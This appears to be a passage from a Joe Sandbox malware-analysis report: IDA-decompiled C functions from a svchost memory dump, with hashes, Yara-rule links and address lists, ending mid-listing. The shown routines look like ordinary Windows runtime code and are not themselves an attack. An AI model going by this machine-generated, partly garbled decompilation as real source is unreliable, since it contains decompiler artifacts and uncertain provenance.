                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7395d5ed7a7036b27b9553c1474fd53ecc3ba8306aa373148e90e6b18cb40937
                        • Instruction ID: 99ab68417e590cc47384197dbc0dbed3a9ffae571fc613ad5278f4224b625275
                        • Opcode Fuzzy Hash: 7395d5ed7a7036b27b9553c1474fd53ecc3ba8306aa373148e90e6b18cb40937
                        • Instruction Fuzzy Hash: F631F771A02229ABCF14EF65CD81ABFB7B8FF44700F054469F901DB150EB74AA10C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030561A0 Relevance: .1, Instructions: 93COMMON
                        Download Yara Rule
                        C-Code - Quality: 97%
                        			E030561A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03055E50(0x30067cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E030F9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0302F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                        0x030561b3
                        0x030561b5
                        0x030561bd
                        0x030561c3
                        0x030561c7
                        0x030561d2
                        0x030561ff
                        0x030561ff
                        0x03056201
                        0x03056207
                        0x03056207
                        0x030561d4
                        0x030561d9
                        0x00000000
                        0x00000000
                        0x030561df
                        0x030561e2
                        0x00000000
                        0x00000000
                        0x030561e6
                        0x030561e8
                        0x030561ee
                        0x030561ee
                        0x030561f9
                        0x0309762f
                        0x03097632
                        0x03097635
                        0x03097639
                        0x03097640
                        0x0309766e
                        0x03097675
                        0x00000000
                        0x00000000
                        0x03097681
                        0x03097689
                        0x0309768d
                        0x03097691
                        0x03097695
                        0x03097699
                        0x030976af
                        0x030976b5
                        0x030976b7
                        0x030976b7
                        0x030976d7
                        0x030976dc
                        0x00000000
                        0x030976dc
                        0x030976a2
                        0x030976a9
                        0x03097651
                        0x03097653
                        0x03097653
                        0x03097656
                        0x03097656
                        0x00000000
                        0x03097656
                        0x03097644
                        0x03097646
                        0x03097648
                        0x03097648
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7d5df1bb2d5381f6a90c555eec2111ace50c51815ba1ffcfeab48e66bbf84792
                        • Instruction ID: 5a07eb9fd431d67760183238dcbc9b930790e17bba1fa8eddffe87623cdf63c9
                        • Opcode Fuzzy Hash: 7d5df1bb2d5381f6a90c555eec2111ace50c51815ba1ffcfeab48e66bbf84792
                        • Instruction Fuzzy Hash: 623159726167018FE760CF19C840B2AF7E5FB88B10F49496EB9989B351E771E804CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03064A2C Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E03064A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x311d360 ^ _t62;
				_v8 =  *0x311d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03042280(_t26, 0x3118608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0303FFB0(_t41, _t51, 0x3118608);
						L2:
						 *0x311b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0306B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E03042280(_t28, 0x3118608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0303FFB0(_t42, _t53, 0x3118608);
							if(_t53 != 0) {
								L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0303FFB0(_t41, _t51, 0x3118608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                        0x03064a2c
                        0x03064a34
                        0x03064a3c
                        0x03064a3e
                        0x03064a48
                        0x03064a4b
                        0x03064a4d
                        0x03064a51
                        0x03064a9c
                        0x00000000
                        0x00000000
                        0x03064aa3
                        0x03064aa8
                        0x03064aad
                        0x03064ab1
                        0x03064ade
                        0x03064ae3
                        0x03064a5a
                        0x03064a62
                        0x03064a6a
                        0x03064a6e
                        0x0309f203
                        0x03064a84
                        0x03064a88
                        0x03064a89
                        0x03064a8a
                        0x03064a95
                        0x03064a95
                        0x03064a79
                        0x03064a80
                        0x03064af2
                        0x03064af4
                        0x03064af9
                        0x03064aff
                        0x03064b01
                        0x03064b03
                        0x03064b08
                        0x0309f20a
                        0x0309f212
                        0x0309f216
                        0x0309f216
                        0x03064b08
                        0x03064b13
                        0x03064b1a
                        0x0309f229
                        0x0309f229
                        0x03064b1a
                        0x03064a82
                        0x00000000
                        0x03064a82
                        0x03064ab7
                        0x03064acd
                        0x03064acd
                        0x03064ad5
                        0x03064ada
                        0x00000000
                        0x03064ada
                        0x03064ac2
                        0x03064acb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03064acb
                        0x03064a53
                        0x03064a53
                        0x03064a58
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0eaeba201b0e6a8bfeda1612edb3f70b731f90047d78ca9b257055cae1f5f257
                        • Instruction ID: b58650d0fbc11912b04a972cc2209a193cf36c7527bd8c87dbef37fbc6941d21
                        • Opcode Fuzzy Hash: 0eaeba201b0e6a8bfeda1612edb3f70b731f90047d78ca9b257055cae1f5f257
                        • Instruction Fuzzy Hash: DC31F132607315AFC761EF15CD41BAAF7E8FFC5A11F084969E8664B644CB70D900CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03068EC7 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E03068EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x311d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03054E70(0x31186e4, 0x3069490, 0, 0);
					if( *0x31153e8 > 5 && E03068F33(0x31153e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x31153e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x31153e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x300bc46;
						_t48 = E030A7B9C(0x31153e8, 0x300bc46, _t67, 0x31153e8, _t70,  &_v140);
					}
				}
				return E0306B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                        0x03068ec7
                        0x03068ed9
                        0x03068edc
                        0x03068ee6
                        0x03068ee9
                        0x03068eee
                        0x03068efc
                        0x03068f08
                        0x030a1349
                        0x030a1353
                        0x030a135d
                        0x030a1366
                        0x030a136f
                        0x030a1375
                        0x030a137c
                        0x030a1385
                        0x030a1390
                        0x030a1391
                        0x030a139c
                        0x030a139d
                        0x030a13a6
                        0x030a13ac
                        0x030a13b2
                        0x030a13b5
                        0x030a13bc
                        0x030a13bf
                        0x030a13c2
                        0x030a13c5
                        0x030a13c8
                        0x030a13cb
                        0x030a13ce
                        0x030a13d1
                        0x030a13d4
                        0x030a13d7
                        0x030a13da
                        0x030a13dd
                        0x030a13e0
                        0x030a13e3
                        0x030a13e6
                        0x030a13e9
                        0x030a13f6
                        0x030a1400
                        0x030a1400
                        0x03068f08
                        0x03068f32

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5374d23366034c65fd0061116c248a1963d5611a856997ad51ac48d28dc4700c
                        • Instruction ID: a8fbd8a0c9d603bc1f767bc42703235c6295dd4cb1b1c684a05c97a899b27d97
                        • Opcode Fuzzy Hash: 5374d23366034c65fd0061116c248a1963d5611a856997ad51ac48d28dc4700c
                        • Instruction Fuzzy Hash: 6A418EB1D112289BDB24CFAAD980AEDFBF8FB48710F5081AEA509A7240D7705A84CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305E730 Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E0305E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03069670() < 0) {
					L0307DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3117b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03044620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0305E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                        0x0305e730
                        0x0305e736
                        0x0305e738
                        0x0305e73d
                        0x0305e73e
                        0x0305e740
                        0x0305e749
                        0x0305e765
                        0x0305e76a
                        0x0305e76b
                        0x0305e76c
                        0x0305e76d
                        0x0305e76e
                        0x0305e76f
                        0x0305e775
                        0x0305e777
                        0x0305e77e
                        0x0309b675
                        0x0305e784
                        0x0305e784
                        0x0305e789
                        0x0305e7a8
                        0x0305e7ac
                        0x0305e807
                        0x0305e7ae
                        0x0305e7ae
                        0x0305e7b1
                        0x0305e7b4
                        0x0305e7b9
                        0x0305e7c0
                        0x0305e7c4
                        0x0305e7ca
                        0x0305e7cc
                        0x00000000
                        0x0305e7d3
                        0x0305e7d6
                        0x00000000
                        0x00000000
                        0x0305e7ff
                        0x0305e802
                        0x00000000
                        0x00000000
                        0x0305e7f9
                        0x0305e7fc
                        0x00000000
                        0x00000000
                        0x0305e7f3
                        0x0305e7f6
                        0x00000000
                        0x00000000
                        0x0305e7ed
                        0x0305e7f0
                        0x00000000
                        0x00000000
                        0x0305e7e7
                        0x0305e7ea
                        0x00000000
                        0x00000000
                        0x0309b685
                        0x0309b688
                        0x00000000
                        0x00000000
                        0x0309b682
                        0x00000000
                        0x00000000
                        0x0305e7cc
                        0x0305e7d9
                        0x0305e7dc
                        0x0305e7de
                        0x0305e7de
                        0x0305e7ac
                        0x0305e7e4
                        0x0305e74b
                        0x0305e751
                        0x0305e759
                        0x0305e761
                        0x0305e761

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3531a1dcbaee962938688dd8bd27150d2fd08ec5f33ec61d94610756ac9efdc
                        • Instruction ID: c349079c6909e49692452b9f068c1310c4597459bc8c89fb63c6cc1997137b50
                        • Opcode Fuzzy Hash: a3531a1dcbaee962938688dd8bd27150d2fd08ec5f33ec61d94610756ac9efdc
                        • Instruction Fuzzy Hash: 25318D75A15349AFD744CF68D840B9ABBE8FB08314F1486A6F948CB341D631E980CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305BC2C Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E0305BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3116100; // 0x7
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03042280(0xd, 0xf56f1a0);
				_t41 =  *0x31160f8; // 0x0
				if(_t41 != 0) {
					 *0x31160f8 =  *_t41;
					 *0x31160fc =  *0x31160fc + 0xffff;
				}
				E0303FFB0(_t41, 0x800, 0xf56f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x31160f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03044620(0x3116100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3116100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                        0x0305bc36
                        0x0305bc42
                        0x0305bc45
                        0x0305bc4a
                        0x0305bd35
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0305bc50
                        0x0305bc50
                        0x0305bc58
                        0x0305bc5a
                        0x0305bc60
                        0x00000000
                        0x00000000
                        0x0309a4f2
                        0x0309a4f6
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0309a4fc
                        0x0305bc79
                        0x0305bc7e
                        0x0305bc86
                        0x0305bd16
                        0x0305bd20
                        0x0305bd20
                        0x0305bc8d
                        0x0305bc94
                        0x0305bcbd
                        0x0305bcca
                        0x0305bccb
                        0x0305bccc
                        0x0305bccd
                        0x0305bcce
                        0x0305bcd4
                        0x0305bcea
                        0x0305bcee
                        0x0305bcf2
                        0x0305bd00
                        0x0305bd04
                        0x00000000
                        0x0305bc96
                        0x0305bcab
                        0x0305bcaf
                        0x0305bd2c
                        0x0305bd2c
                        0x0305bd09
                        0x00000000
                        0x0305bd09
                        0x0305bcb1
                        0x0305bcb5
                        0x0305bcbb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0305bcbb

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfcce87c4a8686d8242a095d825e4e632a3b1c0588a49e028b806dbe0436d442
                        • Instruction ID: 014b3f792e0ac7fe8e2e53684e93e093121263dd0ee67f15f75fa32c9c48f088
                        • Opcode Fuzzy Hash: dfcce87c4a8686d8242a095d825e4e632a3b1c0588a49e028b806dbe0436d442
                        • Instruction Fuzzy Hash: CE312036A026199FCB51EF58C4807EBB3A8FF48311F0504B9EC44EB205EB75EA45CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03029100 Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E03029100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x30ff6e8);
				E0307D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E030F88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0307D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x31186c0; // 0x2801228
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x31186b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03042280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E030F88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0306AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x311b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x31184c0;
										if(_t69 >=  *0x31184c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E030F9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0302922A(_t82);
							_t53 = E03047D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E030F8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x31186c0; // 0x2801228
								if(__eflags != 0) {
									__eflags = _t82 -  *0x31186b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x31186bc;
										_t72 = 0x31186b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E03029240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x31186c4;
									_t72 = 0x31186c0;
									L18:
									E03059B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                        0x03029100
                        0x03029100
                        0x03029100
                        0x03029100
                        0x03029102
                        0x03029107
                        0x0302910c
                        0x03029110
                        0x03029115
                        0x03029136
                        0x03029143
                        0x030837e4
                        0x030837e4
                        0x03029149
                        0x0302914e
                        0x0302914e
                        0x03029117
                        0x0302911d
                        0x00000000
                        0x00000000
                        0x0302911f
                        0x03029125
                        0x00000000
                        0x03029151
                        0x03029158
                        0x0302915d
                        0x03029161
                        0x03029168
                        0x03083715
                        0x00000000
                        0x0302916e
                        0x0302916e
                        0x03029175
                        0x03029177
                        0x0302917e
